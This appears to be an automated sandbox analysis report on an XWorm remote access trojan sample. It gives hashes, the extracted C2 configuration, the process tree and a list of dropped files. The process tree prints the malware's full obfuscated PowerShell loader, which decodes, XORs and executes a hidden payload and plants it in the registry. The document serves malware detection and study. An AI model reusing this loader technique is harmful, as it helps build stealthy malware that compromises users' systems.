xworm | 2e54b909f0877f84d90b27901fec21ebf4b55a07e18050e5ef0993b46ade226e

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
05/03/2025, 14:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2e54b909f0877f84d90b27901fec21ebf4b55a07e18050e5ef0993b46ade226e.exe
Size

10.1MB
MD5

eb3ddeaf46d8dd1c61565006ee0d70a6
SHA1

259b2ff84832eccc4e69e8cc72ac527e4594f34a
SHA256

2e54b909f0877f84d90b27901fec21ebf4b55a07e18050e5ef0993b46ade226e
SHA512

fc2d9f0fb2e7e06989b86dc430c62e9030cdc5234128d98675a74af1e50564d674cc4cbf1ac6a0a19786cded972c1fb9b15142d07744d788dfa77af5ee0c0118
SSDEEP

196608:MgpaqNwQDmOBBQ04+IrMYd4JIMCSTT0a7u5m9CPyMS/pSYARTsRG6z:taHd04+6MYd73mk6xxnYiG6

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

meowycatty.ddns.net:8843

Mutex

jRccj8SKwN7fQIlB

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/1388-74-0x0000021DEB330000-0x0000021DEB33E000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 1 IoCs

flow	pid	Process
51	1388	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1388	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4400	main.exe

Loads dropped DLL 15 IoCs

pid	Process
4400	main.exe
4400	main.exe
4400	main.exe
4400	main.exe
4400	main.exe
4400	main.exe
4400	main.exe
4400	main.exe
4400	main.exe
4400	main.exe
4400	main.exe
4400	main.exe
4400	main.exe
4400	main.exe
4400	main.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1388	powershell.exe
1388	powershell.exe
1388	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1388	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 1660 wrote to memory of 4400	1660	2e54b909f0877f84d90b27901fec21ebf4b55a07e18050e5ef0993b46ade226e.exe	88
PID 1660 wrote to memory of 4400	1660	2e54b909f0877f84d90b27901fec21ebf4b55a07e18050e5ef0993b46ade226e.exe	88
PID 4400 wrote to memory of 1960	4400	main.exe	96
PID 4400 wrote to memory of 1960	4400	main.exe	96
PID 1960 wrote to memory of 1388	1960	cmd.exe	97
PID 1960 wrote to memory of 1388	1960	cmd.exe	97
PID 4400 wrote to memory of 4328	4400	main.exe	98
PID 4400 wrote to memory of 4328	4400	main.exe	98
PID 4400 wrote to memory of 3036	4400	main.exe	100
PID 4400 wrote to memory of 3036	4400	main.exe	100

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\2e54b909f0877f84d90b27901fec21ebf4b55a07e18050e5ef0993b46ade226e.exe
"C:\Users\Admin\AppData\Local\Temp\2e54b909f0877f84d90b27901fec21ebf4b55a07e18050e5ef0993b46ade226e.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1660
- C:\Users\Admin\AppData\Local\Temp\onefile_1660_133856573684107167\main.exe
  C:\Users\Admin\AppData\Local\Temp\2e54b909f0877f84d90b27901fec21ebf4b55a07e18050e5ef0993b46ade226e.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\qws9bqc8.bat
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1960
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -windowstyle hidden -c "Write-Host ('dedaoL rotcartxE llehsrewoP'[-1..-27] -join '');$path = $env:xrDrGAvriu;$path = $path.Trim();try {$_1 = Get-Content -Path $path.Substring(1, $path.Length - 2) -ErrorAction Stop;} catch {$_1 = Get-Content -Path $path;};$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_2.Replace('\n', ''));$_4 = New-Object byte[] $_2.Length;for ($_5 = 0; $_5 -lt $_4.Length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [System.Text.Encoding]::Unicode.GetString($_4);Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows Search' -Name '$phantom-loJDe' -Value $_4;Remove-Item -Path $path -Force;$_4 | Invoke-Expression"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:4328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c
    3⤵
    PID:3036

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_bz2.pyd

Filesize
84KB

MD5
057325e89b4db46e6b18a52d1a691caa

SHA1
8eab0897d679e223aa0d753f6d3d2119f4d72230

SHA256
5ba872caa7fcee0f4fb81c6e0201ceed9bd92a3624f16828dd316144d292a869

SHA512
6bc7606869ca871b7ee5f2d43ec52ed295fa5c3a7df31dbd7e955ddb98c0748aff58d67f09d82edcde9d727e662d1550c6a9cf82f9cb7be021159d4b410e7cbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_ctypes.pyd

Filesize
131KB

MD5
2185849bc0423f6641ee30804f475478

SHA1
d37ca3e68f4b2111fc0c0cead9695d598795c780

SHA256
199cd8d7db743c316771ef7bbf414ba9a9cdae1f974e90da6103563b2023538d

SHA512
ba89db9f265a546b331482d779ab30131814e42ad3711a837a3450f375d2910bd41b3b3258db90b29cd5afccdc695318fc8ad8cd921a57ce25f69aea539b26ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_hashlib.pyd

Filesize
63KB

MD5
cf4120bad9a7f77993dd7a95568d83d7

SHA1
ac477c046d14c5306aa09bb65015330701ef0f89

SHA256
14765e83996fe6d50aedc11bb41d7c427a3e846a6a6293a4a46f7ea7e3f14148

SHA512
f905f9d203f86a7b1fc81be3aba51a82174411878c53fd7a62d17f8e26f5010d195f9371fa7400e2e2dc35fda0db0cbe68367fcaf834dd157542e9ee7a9742b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_lzma.pyd

Filesize
155KB

MD5
3e73bc69efb418e76d38be5857a77027

SHA1
7bee01096669caa7bec81cdc77d6bb2f2346608c

SHA256
6f48e7eba363cb67f3465a6c91b5872454b44fc30b82710dfa4a4489270ce95c

SHA512
b6850e764c8849058488f7051dcabff096709b002d2f427a49e83455838d62a9d3fc7b65285702de2b995858ed433e35a0c4da93c2d5ae34684bf624eb59fa6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_queue.pyd

Filesize
33KB

MD5
59c05030e47bde800ad937ccb98802d8

SHA1
f7b830029a9371b4e500c1548597beb8fbc1864f

SHA256
e4956834df819c1758d17c1c42a152306f7c0ea7b457ca24ce2f6466a6cb1caa

SHA512
4f5e7ef0948155db6712e1bd7f4f31cb81602b325ba4e6e199f67693913b4bb70bb2c983393646c0ac0d86ef81071907d04bceb8ab0d506b7c5ac7c389fe692d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_socket.pyd

Filesize
82KB

MD5
69c4a9a654cf6d1684b73a431949b333

SHA1
3c8886dac45bb21a6b11d25893c83a273ff19e0b

SHA256
8daefaff53e6956f5aea5279a7c71f17d8c63e2b0d54031c3b9e82fcb0fb84db

SHA512
cadcec9a6688b54b36dbd125210d1a742047167dad308907a3c4e976b68483a8c6144e02d5cf26f887744dc41af63b7731551287bb3ef8bd947c38c277783c16

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_ssl.pyd

Filesize
178KB

MD5
ce19076f6b62292ed66fd06e5ba67bba

SHA1
231f6236bdbbe95c662e860d46e56e42c4e3fe28

SHA256
21ca71b2c1766fc68734cb3d1e7c2c0439b86bcfb95e00b367c5fd48c59e617c

SHA512
7357598bc63195c2fd2ddde0376b3ecf5bd0211a286f4a5c1e72e8c68b6e881e7e617f561e7a859c800fe67bec8f4c376e7a6943cab8dacfeda0056b8e864143

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\certifi\cacert.pem

Filesize
290KB

MD5
234d271ecb91165aaec148ad6326dd39

SHA1
d7fccec47f7a5fbc549222a064f3053601400b6f

SHA256
c55b21f907f7f86d48add093552fb5651749ff5f860508ccbb423d6c1fbd80c7

SHA512
69289a9b1b923d89ba6e914ab601c9aee4d03ff98f4ed8400780d4b88df5f4d92a8ca1a458abcfde00c8455d3676aca9ec03f7d0593c64b7a05ed0895701d7ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libcrypto-3.dll

Filesize
5.0MB

MD5
123ad0908c76ccba4789c084f7a6b8d0

SHA1
86de58289c8200ed8c1fc51d5f00e38e32c1aad5

SHA256
4e5d5d20d6d31e72ab341c81e97b89e514326c4c861b48638243bdf0918cfa43

SHA512
80fae0533ba9a2f5fa7806e86f0db8b6aab32620dde33b70a3596938b529f3822856de75bddb1b06721f8556ec139d784bc0bb9c8da0d391df2c20a80d33cb04

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libffi-8.dll

Filesize
38KB

MD5
0f8e4992ca92baaf54cc0b43aaccce21

SHA1
c7300975df267b1d6adcbac0ac93fd7b1ab49bd2

SHA256
eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a

SHA512
6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libssl-3.dll

Filesize
774KB

MD5
4ff168aaa6a1d68e7957175c8513f3a2

SHA1
782f886709febc8c7cebcec4d92c66c4d5dbcf57

SHA256
2e4d35b681a172d3298caf7dc670451be7a8ba27c26446efc67470742497a950

SHA512
c372b759b8c7817f2cbb78eccc5a42fa80bdd8d549965bd925a97c3eebdce0335fbfec3995430064dead0f4db68ebb0134eb686a0be195630c49f84b468113e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\select.pyd

Filesize
31KB

MD5
2663e22900ab5791c6687a264473ae1e

SHA1
d8db587b6c632200ae13be880cc824cdc8390df9

SHA256
baee284995b22d495fd12fa8378077e470978db1522c61bfb9af37fb827f33d1

SHA512
5f29ff4288b9db33976f5f79b9fd07c4900a560bb41fe98c93a33da7a36c0981ffd71f460e81e13e4f6a2debafa6d9284bc1a728734752ba5ad5fbd766659e80

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\unicodedata.pyd

Filesize
694KB

MD5
c0b4c55ce3711af914b2015f707e4452

SHA1
f1c1e9f8a461cfee1199d2100f5c0796733518b6

SHA256
a67eec238162fde20ac24ca7df931792734aad0611be22d1b3a71bc15acf72f3

SHA512
fa6bd9223898ef0c54ca9a67b10207bfce152eadbaec4c91d4e951d0790f455066f5095ed739fa2452aea1420d154beb00bfa9e6e10b46bed687c5d0d7484900

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x2tcnepy.ryt.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_1660_133856573684107167\VCRUNTIME140.dll

Filesize
117KB

MD5
862f820c3251e4ca6fc0ac00e4092239

SHA1
ef96d84b253041b090c243594f90938e9a487a9a

SHA256
36585912e5eaf83ba9fea0631534f690ccdc2d7ba91537166fe53e56c221e153

SHA512
2f8a0f11bccc3a8cb99637deeda0158240df0885a230f38bb7f21257c659f05646c6b61e993f87e0877f6ba06b347ddd1fc45d5c44bc4e309ef75ed882b82e4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_1660_133856573684107167\main.exe

Filesize
13.6MB

MD5
18a31aeb49fd2d80d943ffffb15d79ed

SHA1
7e8783e9ca097a6f58eb89e496b7b7ff4fb01bf6

SHA256
48f8dde7585f4bdbe901791386f55b9e68f8cd0af555f9099825f14347458bb2

SHA512
15cdc1ce5a908fe113462b11e5ef44fe0c52f7b4980e1877cd0e7138e9a426676be3d149d35298f2d66a8b039b4cf25371b0642833c309de5051542b3171d3f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_1660_133856573684107167\python313.dll

Filesize
5.8MB

MD5
501080884bed38cb8801a307c9d7b7b4

SHA1
881b250cc8f4fa4f75111ac557a4fde8e1e217af

SHA256
bf68cf819a1e865170430c10e91c18b427aef88db1da1742020443864aa2b749

SHA512
63d74a4871d1c72c2a79ae8a5d380070f9d2128c16949c3ad36c9862fcc4dab738137ed3d51caf0bc46b36655f8bd8a2d425d68200123415ee8d4de0e1cbebc9

Download Submit
C:\Users\Admin\AppData\Local\Temp\qws9bqc8.bat

Filesize
4.3MB

MD5
c475591ab334bd766b868d4d706938db

SHA1
0e89e12020e858db58b4f8e250c6fea7e03ed95e

SHA256
38908b3b24f91dd837b7f3730f9e0258337f26274ce71bc2f299c5662247fcf6

SHA512
3611b20c0f2918abb33c7869a3755ad78a274dfaab8c69768bd3e3a8762837dedb8b45c64133133dd6d60b8986ca9cfb0db79c0b27cb9bb4cbd7138f286bc28b

Download Submit
memory/1388-59-0x0000021DE9F20000-0x0000021DE9F42000-memory.dmp

Filesize
136KB

Download
memory/1388-69-0x0000021DEAE40000-0x0000021DEAE48000-memory.dmp

Filesize
32KB

Download
memory/1388-70-0x0000021DEAE90000-0x0000021DEAFCA000-memory.dmp

Filesize
1.2MB

Download
memory/1388-71-0x0000021DEAFD0000-0x0000021DEB028000-memory.dmp

Filesize
352KB

Download
memory/1388-73-0x00007FF9EE650000-0x00007FF9EE70E000-memory.dmp

Filesize
760KB

Download
memory/1388-72-0x00007FF9EF670000-0x00007FF9EF865000-memory.dmp

Filesize
2.0MB

Download
memory/1388-74-0x0000021DEB330000-0x0000021DEB33E000-memory.dmp

Filesize
56KB

Download